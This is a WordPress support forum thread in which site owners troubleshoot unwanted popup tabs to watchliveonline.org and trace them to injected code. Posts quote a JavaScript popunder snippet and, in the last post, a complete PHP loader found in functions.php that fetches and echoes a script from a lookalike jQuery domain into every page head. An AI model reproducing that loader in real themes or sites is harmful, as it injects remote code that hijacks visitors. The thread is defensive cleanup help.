Ready to get started?Download WordPress


[resolved] adware/spyware or virus for http://www.watchliveonline.org (10 posts)

  1. i0n1ca
    Posted 2 years ago #

    Starting from today seems that i`ve got a problem. Every time i click on my site (http://i0n1ca.co.cc) on any link, opens me an annoying tab http://www.watchliveonline.org
    I mention that i have not installed anything, like plugins, widgets.
    I`ve wrote like 4-5 posts, thats it.

    If anyone have a solution for this, please help. I just saw in an other thread that from now people ar starting to have this problem.

  2. esmi
    Forum Moderator
    Posted 2 years ago #

  3. mcca
    Posted 2 years ago #

    Hey i0n1ca,

    I have the same Problem. Now I believe I have found the error! You should look at your source code. Have you includet a library from http://jquery.com/?

    if you look into this library since today there is a code like this in line 68!

    function checkTarget(e)
    if ( !getCookie('popundr') ) {
    var e = e || window.event;
    var win = doOpen('http://www.watchliveonline.org');
    setcookie('popundr', 1, time() + (1 * 48 * 60 * 60))

    so i think its not a problem with your site ist a problem from http://jquery.com !

  4. esmi
    Forum Moderator
    Posted 2 years ago #

    No! That is completely and utterly wrong!

    @mcca: Your site has been hacked. Please follow all of the links posted above.

  5. Jonatas Lopes
    Posted 2 years ago #


    where is this file in the theme?

  6. mcca
    Posted 2 years ago #

    @esmi you think my website has been hacked? No i dont think so! If you read my entry you would see that i have located the error, now I remove the file from http://jquery.com/ and all work well like before ;-)

    i dont now where it is located in your theme. Best solution is you get the plugin firebug for firefox an search for http://www.watchliveonline.org then you get the .js file. Then delete this in your template

  7. esmi
    Forum Moderator
    Posted 2 years ago #

    @mcca: Now try browsing these forums and see just how many people had sites that were hacked repeatedly. And take note of the advice that they were given. Do you think we post this stuff for fun?

  8. @mcca that code does not come from jquery.org it comes from jquerys.org which is a malicious domain set up just to trick people into thinking they are loading a script from jquery.org. If the call to that script is in your theme then you have been hacked.

    Also the malicious domain redirects to jquery.org unless the specific file is called.

  9. i0n1ca
    Posted 2 years ago #

    In functions.php delete the first line, and works like a charm!

  10. ersinacar
    Posted 2 years ago #

    same stuff for me! There was
    <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
    This code in a plugin jquerye.com :) check your websites cookie's if there is a cookie named "popundr" its same script they are generally using this one cuz its working at all browsers. just clear the line and you are rdy to go. oh and dont forget to clear your caches if you are using a cache plugin :)

Topic Closed

This topic has been closed to new replies.

About this Topic